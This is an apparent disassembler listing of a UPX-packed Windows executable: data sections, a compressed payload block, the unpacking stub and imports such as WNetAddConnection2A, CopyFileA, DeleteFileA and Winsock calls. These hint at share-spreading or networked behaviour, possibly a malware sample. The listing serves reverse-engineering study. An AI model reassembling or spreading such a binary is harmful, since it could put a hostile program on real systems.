dword_4DCFC8 dd 0 ; DATA XREF: sub_41DE2F+3C�w
; sub_41E4D4+5�r ...
dword_4DCFCC dd 0 ; DATA XREF: sub_41DEA2+23A�r
; sub_41DEA2+25A�r ...
dword_4DCFD0 dd 0 ; DATA XREF: sub_41DE2F+31�w
; sub_41DEA2+311�w ...
dword_4DCFD4 dd 0 ; DATA XREF: sub_41DE2F+21�w
; sub_41DEA2+22D�r ...
dword_4DCFD8 dd 0 ; DATA XREF: sub_41DE2F+28�w
; sub_41DE77�r ...
dword_4DCFDC dd 0 ; DATA XREF: sub_41DE2F+15�w
; sub_41DE77+8�r ...
dword_4DCFE0 dd 0 ; DATA XREF: sub_41B202+5C�r
; sub_41B513+F�r ...
dword_4DCFE4 dd 930000h ; DATA XREF: sub_41B0B1+5A�r
; sub_41B202+C0�r ...
dword_4DCFE8 dd 1 ; DATA XREF: sub_41B0B1+C�r
; sub_41B202:loc_41B232�r ...
dword_4DCFEC dd 142340h ; DATA XREF: UPX0:0041D9AD�w
; sub_422E72+F�r ...
dword_4DCFF0 dd 1 ; DATA XREF: sub_422ECA+AD�w
; sub_425AC7�r
dword_4DCFF4 dd 1 ; DATA XREF: sub_42026D�r
; sub_42026D+11�w ...
dword_4DCFF8 dd 93075Ch ; DATA XREF: sub_41B7D3+3E�r
; sub_41CFD3+13�r ...
dword_4DCFFC dd 930758h ; DATA XREF: sub_41B7D3+35�r
; sub_41B7D3+57�r ...
dd 400h dup(0)
db 74h ; t
align 4
db 0
db 60h, 2, 0
db 1
aFindfirstfilea db 'FindFirstFileA',0
db 1
aSetenvironment db 'SetEnvironmentVariableA',0
db 1, 43h, 6Fh
aMparestringw db 'mpareStringW',0
db 1, 43h, 6Fh
aMparestringa db 'mpareStringA',0
db 1, 53h, 65h
aTendoffile db 'tEndOfFile',0
db 1
aIsbadcodeptr db 'IsBadCodePtr',0
db 1, 49h, 73h
aBadreadptr db 'BadReadPtr',0
db 1
aSetunhandledex db 'SetUnhandledExceptionFilter',0
dd 74654701h, 69727453h, 7954676Eh, 576570h, 74654701h
dd 69727453h, 7954676Eh, 416570h, 756C4601h, 69466873h
dd 7542656Ch, 72656666h, 53010073h, 74537465h, 6E614864h
dd 656C64h, 74654701h, 656C6946h, 65707954h, 65470100h
dd 64745374h, 646E6148h, 100656Ch, 48746553h, 6C646E61h
dd 756F4365h, 100746Eh, 45746547h, 7269766Eh, 656D6E6Fh
dd 7453746Eh, 676E6972h, 1005773h, 45746547h, 7269766Eh
dd 656D6E6Fh, 7453746Eh, 676E6972h, 46010073h, 45656572h
dd 7269766Eh, 656D6E6Fh, 7453746Eh, 676E6972h, 1005773h
dd 65657246h, 69766E45h, 6D6E6F72h, 53746E65h, 6E697274h
dd 417367h, 686E5501h, 6C646E61h, 78456465h, 74706563h
dd 466E6F69h, 65746C69h, 4C010072h, 70614D43h, 69727453h
dd 57676Eh, 4D434C01h, 74537061h, 676E6972h, 48010041h
dd 53706165h, 657A69h, 69615201h, 78456573h, 74706563h
dd 6E6F69h, 74654701h, 434D454Fh, 45010050h, 50746978h
dd 65636F72h, 1007373h, 736F6C43h, 6E614865h, 656C64h
dd 65724301h, 50657461h, 65636F72h, 417373h, 74654701h
dd 75646F4Dh, 6946656Ch, 614E656Ch, 41656Dh, 74654701h
dd 74737953h, 69446D65h, 74636572h, 4179726Fh, 6C530100h
dd 706565h, 65724301h, 54657461h, 61657268h, 44010064h
dd 74656C65h, 6C694665h, 1004165h, 6E65704Fh, 636F7250h
dd 737365h, 74654701h, 72727543h, 50746E65h, 65636F72h
dd 64497373h, 65470100h, 73614C74h, 72724574h, 100726Fh
dd 79706F43h, 656C6946h, 53010041h, 69467465h, 7441656Ch
dd 62697274h, 73657475h, 47010041h, 69467465h, 7441656Ch
dd 62697274h, 73657475h, 47010041h, 6F4D7465h, 656C7564h
dd 646E6148h, 41656Ch, 69615701h, 726F4674h, 676E6953h
dd 624F656Ch, 7463656Ah, 72430100h, 65746165h, 6574754Dh
dd 1004178h, 54746547h, 436B6369h, 746E756Fh, 65540100h
dd 6E696D72h, 54657461h, 61657268h, 47010064h, 65547465h
dd 6150706Dh, 416874h, 766F4D01h, 6C694665h, 1004165h
dd 64616F4Ch, 7262694Ch, 41797261h, 65470100h, 6F725074h
dd 64644163h, 73736572h, 65470100h, 6D6F4374h, 65747570h
dd 6D614E72h, 1004165h, 4C746547h, 6C61636Fh, 666E4965h
dd 100416Fh, 56746547h, 69737265h, 78456E6Fh, 45010041h
dd 54746978h, 61657268h, 4C010064h, 65766165h, 74697243h
dd 6C616369h, 74636553h, 6E6F69h, 746E4501h, 72437265h
dd 63697469h, 65536C61h, 6F697463h, 4901006Eh, 6974696Eh
dd 7A696C61h, 69724365h, 61636974h, 6365536Ch, 6E6F6974h
dd 53646E41h, 436E6970h, 746E756Fh, 65440100h, 6574656Ch
dd 74697243h, 6C616369h, 74636553h, 6E6F69h, 69725701h
dd 69466574h, 100656Ch, 61657243h, 76456574h, 41746E65h
dd 65520100h, 69466461h, 100656Ch, 61657243h, 69466574h
dd 41656Ch, 72655401h, 616E696Dh, 72506574h, 7365636Fh
dd 44010073h, 696C7075h, 65746163h, 646E6148h, 100656Ch
dd 43746547h, 65727275h, 7250746Eh, 7365636Fh, 43010073h
dd 74616572h, 70695065h, 47010065h, 69547465h, 6F46656Dh
dd 74616D72h, 47010041h, 61447465h, 6F466574h, 74616D72h
dd 47010041h, 69467465h, 6953656Ch, 100657Ah, 646E6946h
dd 736F6C43h, 46010065h, 54656C69h, 54656D69h, 7379536Fh
dd 546D6574h, 656D69h, 6C694601h, 6D695465h, 4C6F5465h
dd 6C61636Fh, 656C6946h, 656D6954h, 69460100h, 654E646Eh
dd 69467478h, 41656Ch, 74655301h, 656C6946h, 6E696F50h
dd 726574h, 74655301h, 736E6F43h, 43656C6Fh, 486C7274h
dd 6C646E61h, 1007265h, 74696157h, 4D726F46h, 69746C75h
dd 4F656C70h, 63656A62h, 1007374h, 656E6547h, 65746172h
dd 736E6F43h, 43656C6Fh, 456C7274h, 746E6576h, 65470100h
dd 636F4C74h, 69546C61h, 100656Dh, 72657551h, 72655079h
dd 6D726F66h, 65636E61h, 6E756F43h, 726574h, 65755101h
dd 65507972h, 726F6672h, 636E616Dh, 65724665h, 6E657571h
dd 1007963h, 65657246h, 7262694Ch, 797261h, 74654701h
dd 69766E45h, 6D6E6F72h, 56746E65h, 61697261h, 57656C62h
dd 65480100h, 72467061h, 1006565h, 70616548h, 6F6C6C41h
dd 47010063h, 72507465h, 7365636Fh, 61654873h, 56010070h
dd 75747269h, 75516C61h, 45797265h, 52010078h, 50646165h
dd 65636F72h, 654D7373h, 79726F6Dh, 65470100h, 73795374h
dd 496D6574h, 6F666Eh, 726F4601h, 4D74616Dh, 61737365h
dd 416567h, 6F6C4701h, 556C6162h, 636F6C6Eh, 4701006Bh
dd 61626F6Ch, 636F4C6Ch, 5501006Bh, 70616D6Eh, 77656956h
dd 6946664Fh, 100656Ch, 5670614Dh, 4F776569h, 6C694666h
dd 43010065h, 74616572h, 6C694665h, 70614D65h, 676E6970h
dd 53010041h, 69467465h, 6954656Ch, 100656Dh, 46746547h
dd 54656C69h, 656D69h, 70784501h, 45646E61h, 7269766Eh
dd 656D6E6Fh, 7453746Eh, 676E6972h, 1004173h, 65646957h
dd 72616843h, 754D6F54h, 4269746Ch, 657479h, 6C754D01h
dd 79426974h, 6F546574h, 65646957h, 72616843h, 736C0100h
dd 6D637274h, 416970h, 74654701h, 74697845h, 65646F43h
dd 636F7250h, 737365h, 65655001h, 6D614E6Bh, 69506465h
dd 1006570h, 4C746547h, 6369676Fh, 72446C61h, 73657669h
dd 6C470100h, 6C61626Fh, 6F6D654Dh, 74537972h, 73757461h
dd 65480100h, 65527061h, 6F6C6C41h, 52010063h, 6E556C74h
dd 646E6977h, 65470100h, 6D695474h, 6E6F5A65h, 666E4965h
dd 616D726Fh, 6E6F6974h, 65470100h, 73795374h, 546D6574h
dd 656D69h, 74654701h, 72617453h, 49707574h, 416F666Eh
dd 65470100h, 6D6F4374h, 646E616Dh, 656E694Ch, 47010041h
dd 65567465h, 6F697372h, 4701006Eh, 6E457465h, 6F726976h
dd 6E656D6Eh, 72615674h, 6C626169h, 1004165h, 70616548h
dd 74736544h, 796F72h, 61654801h, 65724370h, 657461h, 72695601h
dd 6C617574h, 65657246h, 69560100h, 61757472h, 6C6C416Ch
dd 100636Fh, 61427349h, 69725764h, 74506574h, 47010072h
dd 50437465h, 6F666E49h, 65470100h, 50434174h, 810000h
dd 61D80000h, 57010002h, 4174654Eh, 6F436464h, 63656E6Eh
dd 6E6F6974h, 4132h, 89h, 261E0h, 0FF0007FFh, 0CFF000Fh
dd 74FF00h, 0FF0073FFh, 0AFF0015h, 2FF00h, 0FF000DFFh
dd 57010001h, 6F534153h, 74656B63h, 0BFF0041h, 9FF00h
dd 0FF0004FFh, 3FF0010h, 17FF00h, 0FF0013FFh, 97FF0012h
dd 6FF00h, 0
dd offset dword_445750+0F8B0h
dd 4014C00h, 18DA3300h, 47h, 0
dd 0F00E000h, 6010B01h, 2600000h, 0B600000h, 0
dd 1D93300h, 100000h, 2700000h, 40000000h, 100000h, 20000h
dd 400h, 0
dd 400h, 0
dd 0DE00000h, 100000h, 0
dd 200h, 10000000h, 100000h, 10000000h, 100000h, 0
dd 1000h, 2 dup(0)
dd 2818000h, 5000h, 1Ch dup(0)
dd 65742E00h, 7478h, 25E8400h, 100000h, 2600000h, 40000h
dd 3 dup(0)
dd 2000h, 64722E60h, 617461h, 1CAE00h, 2700000h, 1E0000h
dd 2640000h, 3 dup(0)
dd 4000h, 61642E40h, 6174h, 0B400000h, 2900000h, 1480000h
dd 2820000h, 3 dup(0)
dd 4000h, 78732EC0h, 61746164h, 1800h, 0DD00000h, 20000h
dd 3CA0000h, 3 dup(0)
dd 24000h, 0DD000C0h, 2840800h, 0DD82900h, 0D7708000h
dd 0E4A25453h, 50870A83h, 75B65444h, 96D36B02h, 0DADE0306h
dd 171F9FEAh, 79E79EEEh, 5A063BDEh, 0D4B59778h, 79F34F3Eh
dd 300111F3h, 9E016D4Eh, 67D379E7h, 7759063Ah, 4F79B496h
dd 0D364AE79h, 62F4EF2h, 0A1EC794Dh, 0A0516CEAh, 0C8174002h
dd 21F21F05h, 4008FA27h, 0C3500C9Ch, 0F20F900Fh, 12F42421h
dd 16989680h, 7C8FE57Fh, 19BEBC20h, 1BC9BF04h, 0EDA1348Eh
dd 0C21BCECCh, 0FFFFFFD3h, 20404EFFh, 70B59EF0h, 0C5ADA82Bh
dd 0D040699Dh, 0E525FD5Dh, 194F8E1Ah, 714083EBh, 4395D796h
dd 0FFFFED0Eh, 298D05FFh, 0F9409EAFh, 0ED44A0BFh, 818F1281h
dd 0BF40B982h, 0CFA6D53Ch, 781F49FFh, 0F8094078h, 0C66FFFFFh
dd 80E98CE0h, 93BA47C9h, 85BC41A8h, 3927556Bh, 0FF70F78Dh
dd 0EFFFFh, 0DE8EDDBCh, 0EBFB9DF9h, 4351AA7Eh, 0E376E6A1h
dd 2F29F2CCh, 44268184h, 0FFFFFFFFh, 0AA171028h, 0E310AEF8h
dd 44FAC4C5h, 0F3D4A7EBh, 4AE1EBF7h, 45CF957Ah, 91C7CC65h
dd 0A0AEA60Eh, 0FFFFFFFFh, 46A3E319h, 0C17650Dh, 75868175h
dd 4D48C976h, 0A7E44258h, 353B3993h, 53EDB2B8h, 5DE5A74Dh
dd 0FFFFFFFFh, 3B5DC53Dh, 5A929E8Bh, 0F0A65DFFh, 54C020A1h
dd 61378CA5h, 5A8BFDD1h, 5D25D88Bh, 67DBF989h, 0FFFFFE32h
dd 0F3F895AAh, 0C8A2BF27h, 6E80DD5Dh, 979BC94Ch, 52028A20h
dd 0BB25C460h, 0F776CCFFh, 102CCCDh, 3D713FFBh, 70A3D70Ah
dd 0FF3FF809h, 5AFFFFFFh, 4FDF3B64h, 126E978Dh, 0C33FF583h
dd 19652CD3h, 0B71758E2h, 0D03FF1D1h, 4784230Fh, 0FFAC471Bh
dd 0C5FFFFFFh, 403FEEA7h, 6C69B6A6h, 37BD05AFh, 333FEB86h
dd 7A42BC3Dh, 0BF94D5E5h, 0C23FE7D6h, 0FFCEFDFDh, 61FFFFFFh
dd 0CC771184h, 2F3FE4ABh, 4DE15B4Ch, 9594BEC4h, 923FC9E6h
dd 753B53C4h, 0BE14CD44h, 0FF3FAF9Ah, 0DEFFFFFFh, 3994BA67h
dd 0B11EAD45h, 243F94CFh, 0BCE2C623h, 61313BBAh, 613F7A8Bh
dd 7EC15955h, 0FF7C53B1h, 12FFFEDFh, 0D73F5FBBh, 68D2FEEh
dd 158592BEh, 3F4644FBh, 0A539E9A5h, 0A87FEA27h, 0AC7D3F2Ah
dd 0FFFFFFFFh, 64BCE4A1h, 0DDD0467Ch, 7B633E55h, 5423CC06h
dd 91FF8377h, 0FA913D81h, 637A193Ah, 0C0314325h, 0FFFFFFFFh
dd 89213CACh, 478238D1h, 0FD00B897h, 88DC3BD7h, 0B11B0858h
dd 0A686E3E8h, 84C63B03h, 0B6074245h, 0FFFFFFFFh, 0DB377599h
dd 71333A2Eh, 0DB23D21Ch, 9049EE32h, 87A6395Ah, 0DA57C0BEh
dd 0A2A682A5h, 68E232B5h, 0FFFFFFFFh, 52A711B2h, 0B759449Fh
dd 49252C10h, 34362DE4h, 0CEAE534Fh, 598F256Bh, 0DEC0A404h
dd 0E8FB7DC2h, 0FFFFFFDBh, 0E79E1EC6h, 91575A88h, 8350BF3Ch
dd 4B4E1822h, 83FD6265h, 9406AF8Fh, 0DE5A117Dh, 64E19Fh
dd 0C8D2CEFFh, 0D8A6DD04h, 25FE0Ah, 41D9407Ch, 210EF56h
dd 0CC400C73h, 0A08D0A2Fh, 5F635A5Fh, 60040FFh, 3A826E7Bh
dd 2CE63F00h, 5F36D5E8h, 315F666Fh, 91B19841h, 81A17FD8h
dd 0B62D489Eh, 5F8487h, 8232B7C0h, 63470C38h, 0F7751000h
dd 46020A8Bh, 0A82A2CE9h, 4597F51h, 8B28150h, 116402A0h
dd 22C80540h, 45900A80h, 8B201500h, 16402A00h, 2C815401h
dd 5902A802h, 0B2055004h, 640AA008h, 0C8154011h, 902A8022h
dd 20540045h, 40A8008Bh, 81500116h, 2A0022Ch, 5400459h
dd 0A8008B2h, 15001164h, 2A0022C8h, 54014590h, 0A8028B20h
dd 50041640h, 0A0082C81h, 40115902h, 8022B205h, 45640Ah
dd 8BC815h, 116902Ah, 22C2054h, 45940A8h, 8B28150h, 116402A0h
dd 22C80540h, 45900A80h, 8B201500h, 16402A00h, 2C815401h
dd 5902A802h, 0B2055004h, 640AA008h, 0C8154011h, 902A8022h
dd 20540045h, 40A8008Bh, 81500116h, 2A0022Ch, 5400459h
dd 0A8008B2h, 15001164h, 2A0022C8h, 54014590h, 0A8028B20h
dd 50041640h, 0A0082C81h, 40115902h, 8022B205h, 45640Ah
dd 8BC815h, 116902Ah, 22D2054h, 0A87340A8h, 7401A82Ah
dd 9944E200h, 260F8h, 84910801h, 61476507h, 0C80BB099h
dd 80B81E41h, 3BABF180h, 61778956h, 31629E98h, 94968902h
dd 0B61E7207h, 57BB44D8h, 4F64711Fh, 0F88B4566h, 491A8FE6h
dd 64614273h, 766FCB7Ch, 1B3E5038h, 64616552h, 226E5552h
dd 1145A63Eh, 0FBCC4564h, 6C2F5236h, 47386574h, 0C88B05F6h
dd 1F57D2A5h, 2DC4CB0Bh, 127DCBCCh, 1DC73848h, 0BDEE7373h
dd 64429DEDh, 3B5F9F48h, 0E265795Bh, 51356DBDh, 0DE0AD915h
dd 0D53B1915h, 2DC15ACBh, 2F5773D8h, 5F65D8F2h, 0B6219811h
dd 5BCB4131h, 4C4FC31Bh, 70614D43h, 186A1B95h, 48EF83FBh
dd 7A691865h, 69615260h, 0A4776573h, 313FD84Ch, 434D454Fh
dd 90B81250h, 0F347132h, 61571201h, 0E2015799h, 6B04BEDDh
dd 84674137h, 576517C3h, 67B8482Bh, 48270DCAh, 7912F88Bh
dd 422CCCC2h, 0CE3C7F21h, 807D847Fh, 0C41AA724h, 0C55B438Eh
dd 4E978835h, 7187EFCAh, 5B0C4B7h, 7B5C4925h, 4F2218ACh
dd 4797043h, 0AB1D2F89h, 0DAB07413h, 6529C782h, 0C4902733h
dd 9D5B5825h, 61C49022h, 3653A32Eh, 2EC10DE4h, 684D499Fh
dd 57116578h, 6369547Ch, 1454AB6Bh, 638B05BCh, 70D43D87h
dd 4CA47DA0h, 76BC01E7h, 87618089h, 3C6F4C9Fh, 978388B0h
dd 0B4938B15h, 99C70588h, 869122C1h, 146D615Ch, 0FC01D848h
dd 89049D76h, 611F1E37h, 0C18BB0D9h, 0E7270C45h, 0A1220A4Ch
dd 43CCA24Ch, 816D76E5h, 6E424D65h, 0CA362B98h, 49498E24h
dd 0D0C30986h, 6A044161h, 5C1E0B17h, 89A715AFh, 576E0C54h
dd 9CF5A020h, 0EB94D606h, 0D22DD1Ch, 0E92FD60Bh, 45A26C3Dh
dd 0C7B5938Ch, 0E7362AB1h, 0DE69ABB5h, 0A94D88B0h, 0C19B9AB8h
dd 266D282Eh, 1FBF440Dh, 0DC8EBE8Eh, 3FBD85D7h, 0EEEC72ECh
dd 54712814h, 2B16F96Fh, 187B6D89h, 91731DB7h, 9894C638h
dd 92B74683h, 431FAF30h, 24F88B6h, 9712437h, 2C75CA56h
dd 1880C1ACh, 3C6E2901h, 0DAC3C54h, 0AB51674Ah, 0B2265350h
dd 0A6A26FEBh, 0D9015C4Ch, 3571DAF8h, 0E6798FFFh, 7F0D4D52h
dd 1353AD57h, 44CB6B3Ch, 8C045BB9h, 29C736E6h, 0E14B561Eh
dd 0D9B1CF78h, 5A41899Eh, 4D70CAD5h, 96795062h, 0B338789h
dd 20D1EDF8h, 1750431h, 0EB9EC37Bh, 6BBCF265h, 26174C1Bh
dd 35B02BB1h, 65C07050h, 1D4D4777h, 23A5E050h, 0A970304Dh
dd 8A9B5A38h, 0DA194723h, 80F8670h, 57EDE670h, 0DD6E6469h
dd 6882142Fh, 420DA4F2h, 6D5E7479h, 158D985Bh, 6C283F2Ah
dd 6D636873h, 8729C078h, 64816BD6h, 0E30DA747h, 6B65DCEBh
dd 0D7F164F7h, 3F189960h, 21912073h, 0C133BD04h, 41C190F0h
dd 7A236CBBh, 52BFBC3Ch, 92771474h, 89040D6Dh, 655A5A82h
dd 0A4118967h, 95C99F61h, 0CD2204AAh, 0D7B2A0CBh, 56E60EE2h
dd 0C889ED74h, 41DBC510h, 414B219h, 0C1BB19F9h, 0C3146396h
dd 27591913h, 4B61395Ch, 0F02B4C9Fh, 50F17C52h, 0EC4114C9h
dd 9A08100h, 0D86A0AB3h, 4B4F3E61h, 893ABD0Dh, 0D307FFE0h
dd 4D34D34h, 73740C0Fh, 0F35C4C15h, 0D2E0A4Ch, 0DA697601h
dd 0FF9DB4A3h, 409040Bh, 0A69A69A6h, 13170310h, 17FFFC12h
dd 8106979Ah, 4550h, 4014Ch, 4718DA33h, 9FF3BC45h, 10F00E0h
dd 606010Bh, 772F350Bh, 0D933E902h, 40027001h, 97B763B2h
dd 67041417h, 370D7904h, 0CDF605B1h, 1019003Dh, 22A70D0Fh
dd 804919F9h, 50000281h, 3056742Eh, 7865CFC1h, 21025E84h
dd 36DA9960h, 2001DDF1h, 7722E2Ah, 7DF82EFBh, 1EF71CAEh
dd 4F02640Eh, 2F69F340h, 4D2E047Bh, 904E0B12h, 0BEEC0148h
dd 0C082491Fh, 5378732Eh, 0DD02118h, 33B1333Bh, 4F03CA49h
dd 84083702h, 6F092492h, 0DD82910h, 2A000000h, 0FF49h
dd 3 dup(0)
; ---------------------------------------------------------------------------
public start
start:
pusha
mov esi, offset dword_4C5000
lea edi, [esi-0C4000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_4DF262
; ---------------------------------------------------------------------------
align 8
loc_4DF258: ; CODE XREF: UPX1:loc_4DF269�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_4DF25E: ; CODE XREF: UPX1:004DF317�j
; UPX1:004DF32D�j
add ebx, ebx
jnz short loc_4DF269
loc_4DF262: ; CODE XREF: UPX1:004DF250�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_4DF269: ; CODE XREF: UPX1:004DF260�j
jb short loc_4DF258
mov eax, 1
loc_4DF270: ; CODE XREF: UPX1:004DF29A�j
add ebx, ebx
jnz short loc_4DF27B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_4DF27B: ; CODE XREF: UPX1:004DF272�j
adc eax, eax
add ebx, ebx
jnb short loc_4DF28C
jnz short loc_4DF2AB
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jb short loc_4DF2AB
loc_4DF28C: ; CODE XREF: UPX1:004DF27F�j
dec eax
add ebx, ebx
jnz short loc_4DF298
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_4DF298: ; CODE XREF: UPX1:004DF28F�j
adc eax, eax
jmp short loc_4DF270
; ---------------------------------------------------------------------------
loc_4DF29C: ; CODE XREF: UPX1:loc_4DF2CE�j
; UPX1:loc_4DF2DC�j
add ebx, ebx
jnz short loc_4DF2A7
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_4DF2A7: ; CODE XREF: UPX1:004DF29E�j
adc ecx, ecx
jmp short loc_4DF2FD
; ---------------------------------------------------------------------------
loc_4DF2AB: ; CODE XREF: UPX1:004DF281�j
; UPX1:004DF28A�j
xor ecx, ecx
sub eax, 3
jb short loc_4DF2C3
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_4DF332
sar eax, 1
mov ebp, eax
jmp short loc_4DF2CE
; ---------------------------------------------------------------------------
loc_4DF2C3: ; CODE XREF: UPX1:004DF2B0�j
add ebx, ebx
jnz short loc_4DF2CE
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_4DF2CE: ; CODE XREF: UPX1:004DF2C1�j
; UPX1:004DF2C5�j
jb short loc_4DF29C
inc ecx
add ebx, ebx
jnz short loc_4DF2DC
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_4DF2DC: ; CODE XREF: UPX1:004DF2D3�j
jb short loc_4DF29C
loc_4DF2DE: ; CODE XREF: UPX1:004DF2ED�j
; UPX1:004DF2F8�j
add ebx, ebx
jnz short loc_4DF2E9
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_4DF2E9: ; CODE XREF: UPX1:004DF2E0�j
adc ecx, ecx
add ebx, ebx
jnb short loc_4DF2DE
jnz short loc_4DF2FA
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_4DF2DE
loc_4DF2FA: ; CODE XREF: UPX1:004DF2EF�j
add ecx, 2
loc_4DF2FD: ; CODE XREF: UPX1:004DF2A9�j
cmp ebp, 0FFFFFB00h
adc ecx, 2
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_4DF31C
loc_4DF30E: ; CODE XREF: UPX1:004DF315�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_4DF30E
jmp loc_4DF25E
; ---------------------------------------------------------------------------
loc_4DF31C: ; CODE XREF: UPX1:004DF30C�j
; UPX1:004DF329�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_4DF31C
add edi, ecx
jmp loc_4DF25E
; ---------------------------------------------------------------------------
loc_4DF332: ; CODE XREF: UPX1:004DF2BB�j
pop esi
mov edi, esi
mov ecx, 0FC2h
loc_4DF33A: ; CODE XREF: UPX1:004DF341�j
; UPX1:004DF346�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_4DF33F: ; CODE XREF: UPX1:004DF364�j
cmp al, 1
ja short loc_4DF33A
cmp byte ptr [edi], 11h
jnz short loc_4DF33A
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov al, bl
loop loc_4DF33F
lea edi, [esi+0DD000h]
loc_4DF36C: ; CODE XREF: UPX1:004DF38E�j
mov eax, [edi]
or eax, eax
jz short loc_4DF3B7
mov ebx, [edi+4]
lea eax, [eax+esi+0DF000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+0DF050h]
xchg eax, ebp
loc_4DF389: ; CODE XREF: UPX1:004DF3AF�j
mov al, [edi]
inc edi
or al, al
jz short loc_4DF36C
mov ecx, edi
jns short near ptr loc_4DF39A+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_4DF39A: ; CODE XREF: UPX1:004DF392�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+0DF054h]
or eax, eax
jz short loc_4DF3B1
mov [ebx], eax
add ebx, 4
jmp short loc_4DF389
; ---------------------------------------------------------------------------
loc_4DF3B1: ; CODE XREF: UPX1:004DF3A8�j
call dword ptr [esi+0DF05Ch]
loc_4DF3B7: ; CODE XREF: UPX1:004DF370�j
mov ebp, [esi+0DF058h]
lea edi, [esi-1000h]
mov ebx, 1000h
push eax
push esp
push 4
push ebx
push edi
call ebp ; GetEnvironmentStringsW
lea eax, [edi+1FFh]
and byte ptr [eax], 7Fh
and byte ptr [eax+28h], 7Fh
pop eax
push eax
push esp
push eax
push ebx
push edi
call ebp ; GetEnvironmentStringsW
pop eax
popa
lea eax, [esp-80h]
loc_4DF3EB: ; CODE XREF: UPX1:004DF3EF�j
push 0
cmp esp, eax
jnz short loc_4DF3EB
sub esp, 0FFFFFF80h
jmp loc_41D933
; ---------------------------------------------------------------------------
align 1000h
UPX1 ends
; Section 3. (virtual address 000E0000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 000E0000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
UPX2 segment para public 'DATA' use32
assume cs:UPX2
;org 4E0000h
dd 3 dup(0)
dd 0E0074h, 0E0050h, 3 dup(0)
dd 0E0081h, 0E0064h, 3 dup(0)
dd 0E0089h, 0E006Ch, 5 dup(0)
dd 77E805D8h, 77E7A5FDh, 77E6169Ah, 77E75CB5h, 0
aMQ db 'ˬq',0
align 4
dd 71AB157Eh, 0
aKernel32_dll_0 db 'KERNEL32.DLL',0
aMpr_dll_0 db 'MPR.dll',0
aWs2_32_dll_0 db 'WS2_32.dll',0
db 0
align 2
aLoadlibrarya db 'LoadLibraryA',0
align 4
aGetprocaddress db 'GetProcAddress',0
align 4
aVirtualprotect db 'VirtualProtect',0
align 4
aExitprocess db 'ExitProcess',0
db 0
align 2
aWnetaddconne_1 db 'WNetAddConnection2A',0
align 1000h
UPX2 ends
; Section 4. (virtual address 000E1000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 000E1000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 4E1000h
align 2000h
_idata2 ends
end start